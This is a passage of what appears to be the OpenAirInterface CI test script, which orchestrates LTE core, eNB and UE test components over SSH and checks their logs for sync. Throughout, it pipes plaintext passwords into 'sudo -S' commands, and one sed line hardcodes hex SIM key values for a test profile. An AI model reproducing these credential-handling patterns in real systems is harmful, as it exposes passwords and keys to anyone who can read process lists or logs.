self.command('sudo daemon --unsafe --name=hss_daemon --chdir=' + self.EPCSourceCodePath + '/scripts -o ' + self.EPCSourceCodePath + '/scripts/hss_' + self.testCase_id + '.log ./my-hss.sh', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS')
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_hss 2>&1 | stdbuf -o0 awk \'{ print strftime("[%Y/%m/%d %H:%M:%S] ",systime()) $0 }\' | stdbuf -o0 tee -a hss_' + self.testCase_id + '.log &', 'Core state: 2 -> 3', 35)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
logging.debug('Using the ltebox simulated HSS')
self.command('if [ -d ' + self.EPCSourceCodePath + '/scripts ]; then echo ' + self.eNBPassword + ' | sudo -S rm -Rf ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('mkdir -p ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('cd /opt/hss_sim0609', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f hss.log daemon.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "Starting sudo session" && sudo daemon --unsafe --name=simulated_hss --chdir=/opt/hss_sim0609 ./starthss_real ', '\$', 5)
else:
logging.error('This option should not occur!')
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeMME(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC Release 14 MME')
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f mme_' + self.testCase_id + '.log', '\$', 5)
self.command('echo "./run_mme --config-file /usr/local/etc/oai/mme.conf --set-virt-if" > ./my-mme.sh', '\$', 5)
self.command('chmod 755 ./my-mme.sh', '\$', 5)
self.command('sudo daemon --unsafe --name=mme_daemon --chdir=' + self.EPCSourceCodePath + '/scripts -o ' + self.EPCSourceCodePath + '/scripts/mme_' + self.testCase_id + '.log ./my-mme.sh', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('stdbuf -o0 hostname', '\$', 5)
result = re.search('hostname\\\\r\\\\n(?P<host_name>[a-zA-Z0-9\-\_]+)\\\\r\\\\n', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m Hostname Not Found! \u001B[0m')
sys.exit(1)
host_name = result.group('host_name')
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_mme 2>&1 | stdbuf -o0 tee -a mme_' + self.testCase_id + '.log &', 'MME app initialization complete', 100)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_mme', '\$', 5)
else:
logging.error('This option should not occur!')
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeSPGW(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC Release 14 SPGW-CUPS')
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f spgwc_' + self.testCase_id + '.log spgwu_' + self.testCase_id + '.log', '\$', 5)
self.command('echo "spgwc -c /usr/local/etc/oai/spgw_c.conf" > ./my-spgwc.sh', '\$', 5)
self.command('chmod 755 ./my-spgwc.sh', '\$', 5)
self.command('sudo daemon --unsafe --name=spgwc_daemon --chdir=' + self.EPCSourceCodePath + '/scripts -o ' + self.EPCSourceCodePath + '/scripts/spgwc_' + self.testCase_id + '.log ./my-spgwc.sh', '\$', 5)
time.sleep(5)
self.command('echo "spgwu -c /usr/local/etc/oai/spgw_u.conf" > ./my-spgwu.sh', '\$', 5)
self.command('chmod 755 ./my-spgwu.sh', '\$', 5)
self.command('sudo daemon --unsafe --name=spgwu_daemon --chdir=' + self.EPCSourceCodePath + '/scripts -o ' + self.EPCSourceCodePath + '/scripts/spgwu_' + self.testCase_id + '.log ./my-spgwu.sh', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_spgw 2>&1 | stdbuf -o0 tee -a spgw_' + self.testCase_id + '.log &', 'Initializing SPGW-APP task interface: DONE', 30)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_xGw', '\$', 5)
else:
logging.error('This option should not occur!')
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def CheckFlexranCtrlInstallation(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
return
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ls -ls /opt/flexran_rtc/*/rt_controller', '\$', 5)
result = re.search('/opt/flexran_rtc/build/rt_controller', str(self.ssh.before))
if result is not None:
self.flexranCtrlInstalled = True
logging.debug('Flexran Controller is installed')
self.close()
def InitializeFlexranCtrl(self):
if self.flexranCtrlInstalled == False:
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd /opt/flexran_rtc', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f log/*.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "build/rt_controller -c log_config/basic_log" > ./my-flexran-ctl.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 755 ./my-flexran-ctl.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --unsafe --name=flexran_rtc_daemon --chdir=/opt/flexran_rtc -o /opt/flexran_rtc/log/flexranctl_' + self.testCase_id + '.log ././my-flexran-ctl.sh', '\$', 5)
self.command('ps -aux | grep --color=never rt_controller', '\$', 5)
result = re.search('rt_controller -c ', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m Initialize FlexRan Controller Completed\u001B[0m')
self.flexranCtrlStarted = True
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def InitializeeNB(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = False
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_eNB_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
# If tracer options is on, running tshark on EPC side and capture traffic b/ EPC and eNB
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ip addr show | awk -f /tmp/active_net_interfaces.awk | egrep -v "lo|tun"', '\$', 5)
result = re.search('interfaceToUse=(?P<eth_interface>[a-zA-Z0-9\-\_]+)done', str(self.ssh.before))
if result is not None:
eth_interface = result.group('eth_interface')
logging.debug('\u001B[1m Launching tshark on interface ' + eth_interface + '\u001B[0m')
self.EPC_PcapFileName = 'enb_' + self.testCase_id + '_s1log.pcap'
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.command('echo $USER; nohup sudo tshark -f "host ' + lIpAddr +'" -i ' + eth_interface + ' -w /tmp/' + self.EPC_PcapFileName + ' > /tmp/tshark.log 2>&1 &', self.EPCUserName, 5)
self.close()
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath, '\$', 5)
# Initialize_eNB_args usually start with -O and followed by the location in repository
full_config_file = self.Initialize_eNB_args.replace('-O ','')
extra_options = ''
extIdx = full_config_file.find('.conf')
if (extIdx > 0):
extra_options = full_config_file[extIdx + 5:]
# if tracer options is on, compiling and running T Tracer
result = re.search('T_stdout', str(extra_options))
if result is not None:
logging.debug('\u001B[1m Compiling and launching T Tracer\u001B[0m')
self.command('cd common/utils/T/tracer', '\$', 5)
self.command('make', '\$', 10)
self.command('echo $USER; nohup ./record -d ../T_messages.txt -o ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '_record.raw -ON -off VCD -off HEAVY -off LEGACY_GROUP_TRACE -off LEGACY_GROUP_DEBUG > ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '_record.log 2>&1 &', lUserName, 5)
self.command('cd ' + lSourcePath, '\$', 5)
full_config_file = full_config_file[:extIdx + 5]
config_path, config_file = os.path.split(full_config_file)
else:
sys.exit('Insufficient Parameter')
ci_full_config_file = config_path + '/ci-' + config_file
rruCheck = False
result = re.search('^rru|^rcc|^du.band', str(config_file))
if result is not None:
rruCheck = True
# do not reset board twice in IF4.5 case
result = re.search('^rru|^enb|^du.band', str(config_file))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S uhd_find_devices', '\$', 10)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + lPassWord + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
# Reloading FGPA bin firmware
self.command('echo ' + lPassWord + ' | sudo -S uhd_find_devices', '\$', 15)
# Make a copy and adapt to EPC / eNB IP addresses
self.command('cp ' + full_config_file + ' ' + ci_full_config_file, '\$', 5)
self.command('sed -i -e \'s/CI_MME_IP_ADDR/' + self.EPCIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_ENB_IP_ADDR/' + lIpAddr + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RCC_IP_ADDR/' + self.eNBIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RRU1_IP_ADDR/' + self.eNB1IPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RRU2_IP_ADDR/' + self.eNB2IPAddress + '/\' ' + ci_full_config_file, '\$', 2);
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.command('sed -i -e \'s/FLEXRAN_ENABLED.*;/FLEXRAN_ENABLED = "yes";/\' ' + ci_full_config_file, '\$', 2);
else:
self.command('sed -i -e \'s/FLEXRAN_ENABLED.*;/FLEXRAN_ENABLED = "no";/\' ' + ci_full_config_file, '\$', 2);
self.eNBmbmsEnables[int(self.eNB_instance)] = False
self.command('grep enable_enb_m2 ' + ci_full_config_file, '\$', 2);
result = re.search('yes', str(self.ssh.before))
if result is not None:
self.eNBmbmsEnables[int(self.eNB_instance)] = True
logging.debug('\u001B[1m MBMS is enabled on this eNB\u001B[0m')
result = re.search('noS1', str(self.Initialize_eNB_args))
eNBinNoS1 = False
if result is not None:
eNBinNoS1 = True
logging.debug('\u001B[1m eNB is in noS1 configuration \u001B[0m')
# Launch eNB with the modified config file
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo "ulimit -c unlimited && ./lte_build_oai/build/lte-softmodem -O ' + lSourcePath + '/' + ci_full_config_file + extra_options + '" > ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S rm -Rf enb_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S -E daemon --inherit --unsafe --name=enb' + str(self.eNB_instance) + '_daemon --chdir=' + lSourcePath + '/cmake_targets -o ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '.log ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.eNBLogFiles[int(self.eNB_instance)] = 'enb_' + self.testCase_id + '.log'
if extra_options != '':
self.eNBOptions[int(self.eNB_instance)] = extra_options
time.sleep(6)
doLoop = True
loopCounter = 10
enbDidSync = False
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# In case of T tracer recording, we may need to kill it
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.command('killall --signal SIGKILL record', '\$', 5)
self.close()
doLoop = False
logging.error('\u001B[1;37;41m eNB logging system did not show got sync! \u001B[0m')
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'KO', ALL_PROCESSES_OK)
# In case of T tracer recording, we need to kill tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
if self.EPC_PcapFileName != '':
time.sleep(0.5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.close()
time.sleep(1)
if self.EPC_PcapFileName != '':
copyin_res = self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + self.EPC_PcapFileName, '.')
if (copyin_res == 0):
self.copyout(lIpAddr, lUserName, lPassWord, self.EPC_PcapFileName, lSourcePath + '/cmake_targets/.')
self.prematureExit = True
return
else:
self.command('stdbuf -o0 cat enb_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync|Starting"', '\$', 4)
if rruCheck:
result = re.search('wait RUs', str(self.ssh.before))
else:
result = re.search('got sync|Starting F1AP at CU', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
enbDidSync = True
time.sleep(10)
if enbDidSync and eNBinNoS1:
self.command('ifconfig oaitun_enb1', '\$', 4)
result = re.search('inet addr', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_enb1 interface is mounted and configured\u001B[0m')
else:
logging.error('\u001B[1m oaitun_enb1 interface is either NOT mounted or NOT configured\u001B[0m')
if self.eNBmbmsEnables[int(self.eNB_instance)]:
self.command('ifconfig oaitun_enm1', '\$', 4)
result = re.search('inet addr', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_enm1 interface is mounted and configured\u001B[0m')
else:
logging.error('\u001B[1m oaitun_enm1 interface is either NOT mounted or NOT configured\u001B[0m')
self.close()
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'OK', ALL_PROCESSES_OK)
logging.debug('\u001B[1m Initialize eNB Completed\u001B[0m')
def InitializeUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if not self.ADBCentralized:
# Reboot UE
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesRebootCmd[idx], '\$', 60)
# Wait
time.sleep(60)
# Put in LTE-Mode only
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode 11"\'', '\$', 60)
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode1 11"\'', '\$', 60)
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode2 11"\'', '\$', 60)
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode3 11"\'', '\$', 60)
# enable data service
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
# we need to do radio on/off cycle to make sure of above changes
# airplane mode off // radio on
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
time.sleep(10)
# airplane mode on // radio off
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
self.close()
return
# enable data service
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data enable"', '\$', 60)
# The following commands are deprecated since we no longer work on Android 7+
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell settings put global airplane_mode_on 1', '\$', 10)
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true', '\$', 60)
# a dedicated script has to be installed inside the UE
# airplane mode on means call /data/local/tmp/off
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
#airplane mode off means call /data/local/tmp/on
logging.debug('\u001B[1mUE (' + device_id + ') Initialize Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def InitializeUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.InitializeUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def InitializeOAIUE(self):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
# b2xx_fx3_utils reset procedure
self.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 10)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + self.UEPassword + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
# Reloading FGPA bin firmware
self.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 15)
else:
logging.debug('Did not find any B2xx device')
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets/lte_build_oai/build', '\$', 5)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
# We may have to regenerate the .u* files
if result is None:
self.command('ls /tmp/*.sed', '\$', 5)
result = re.search('adapt_usim_parameters', str(self.ssh.before))
if result is not None:
self.command('sed -f /tmp/adapt_usim_parameters.sed ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
else:
self.command('sed -e "s#93#92#" -e "s#8baf473f2f8fd09487cccbd7097c6862#fec86ba6eb707ed08905757b1bb44b8f#" -e "s#e734f8734007d6c5ce7a0508809e7e9c#C42449363BBAD02B66D16BC975D77CC1#" ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf .u*', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S ../../../targets/bin/conf2uedata -c ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf -o .', '\$', 5)
# Launch UE with the modified config file
self.command('echo "ulimit -c unlimited && ./lte-uesoftmodem ' + self.Initialize_OAI_UE_args + '" > ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.command('chmod 775 ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.UELogFile = 'ue_' + self.testCase_id + '.log'
# We are now looping several times to hope we really sync w/ an eNB
doOutterLoop = True
outterLoopCounter = 5
gotSyncStatus = True
fullSyncStatus = True
while (doOutterLoop):
self.command('cd ' + self.UESourceCodePath + '/cmake_targets/lte_build_oai/build', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S -E daemon --inherit --unsafe --name=ue' + str(self.UE_instance) + '_daemon --chdir=' + self.UESourceCodePath + '/cmake_targets/lte_build_oai/build -o ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
time.sleep(6)
self.command('cd ../..', '\$', 5)
doLoop = True
loopCounter = 10
gotSyncStatus = True
# the 'got sync' message is for the UE threads synchronization
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# Here should never occur
logging.error('"got sync" message never showed!')
gotSyncStatus = False
doLoop = False
continue
self.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
result = re.search('got sync', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
logging.debug('Found "got sync" message!')
if gotSyncStatus == False:
# we certainly need to stop the lte-uesoftmodem process if it is still running!
self.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
time.sleep(3)
# We are now checking if sync w/ eNB DOES NOT OCCUR
# Usually during the cell synchronization stage, the UE returns with No cell synchronization message
doLoop = True
loopCounter = 10
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# Here we do have a great chance that the UE did cell-sync w/ eNB
doLoop = False
doOutterLoop = False
fullSyncStatus = True
continue
self.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
result = re.search('No cell synchronization found', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
fullSyncStatus = False
logging.debug('Found: "No cell synchronization" message! --> try again')
time.sleep(6)
self.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
outterLoopCounter = outterLoopCounter - 1
if (outterLoopCounter == 0):
doOutterLoop = False
if fullSyncStatus and gotSyncStatus:
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
self.command('ifconfig oaitun_ue1', '\$', 4)
# ifconfig output is different between ubuntu 16 and ubuntu 18
result = re.search('inet addr:1|inet 1', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_ue1 interface is mounted and configured\u001B[0m')
tunnelInterfaceStatus = True
else:
logging.debug(str(self.ssh.before))
logging.error('\u001B[1m oaitun_ue1 interface is either NOT mounted or NOT configured\u001B[0m')
tunnelInterfaceStatus = False
if self.eNBmbmsEnables[0]:
self.command('ifconfig oaitun_uem1', '\$', 4)
result = re.search('inet addr', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_uem1 interface is mounted and configured\u001B[0m')
tunnelInterfaceStatus = tunnelInterfaceStatus and True
else:
logging.error('\u001B[1m oaitun_uem1 interface is either NOT mounted or NOT configured\u001B[0m')
tunnelInterfaceStatus = False
else:
tunnelInterfaceStatus = True
self.close()
if fullSyncStatus and gotSyncStatus and tunnelInterfaceStatus:
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'OK', ALL_PROCESSES_OK, 'OAI UE')
logging.debug('\u001B[1m Initialize OAI UE Completed\u001B[0m')
if (self.ADBIPAddress != 'none'):
self.UEDevices = []
self.UEDevices.append('OAI-UE')
self.UEDevicesStatus = []
self.UEDevicesStatus.append(UE_STATUS_DETACHED)
else:
if self.eNBmbmsEnables[0]:
self.htmlUEFailureMsg = 'oaitun_ue1/oaitun_uem1 interfaces are either NOT mounted or NOT configured'
else:
self.htmlUEFailureMsg = 'oaitun_ue1 interface is either NOT mounted or NOT configured'
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'KO', OAI_UE_PROCESS_NO_TUNNEL_INTERFACE, 'OAI UE')
logging.error('\033[91mInitialize OAI UE Failed! \033[0m')
self.AutoTerminateUEandeNB()
def checkDevTTYisUnlocked(self):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
count = 0
while count < 5:
self.command('echo ' + self.ADBPassword + ' | sudo -S lsof | grep ttyUSB0', '\$', 10)
result = re.search('picocom', str(self.ssh.before))
if result is None:
count = 10
else:
time.sleep(5)
count = count + 1
self.close()
def InitializeCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Doing a power cycle
self.command('AT^RESET', 'SIMSTORE,READY', 15)
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
self.command('ATE1', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
# Checking if auto-attach is enabled
self.command('AT^AUTOATT?', 'OK', 5)
result = re.search('AUTOATT: (?P<state>[0-9\-]+)', str(self.ssh.before))
if result is not None:
if result.group('state') is not None:
autoAttachState = int(result.group('state'))
if autoAttachState is not None:
if autoAttachState == 0:
self.command('AT^AUTOATT=1', 'OK', 5)
logging.debug('\u001B[1m Auto-Attach enabled\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Could not check Auto-Attach! \u001B[0m')
# Force closure of picocom but device might still be locked
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def TerminateCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def AttachCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Enabling the Radio
self.command('AT+CFUN=1', 'SIMSTORE,READY', 5)
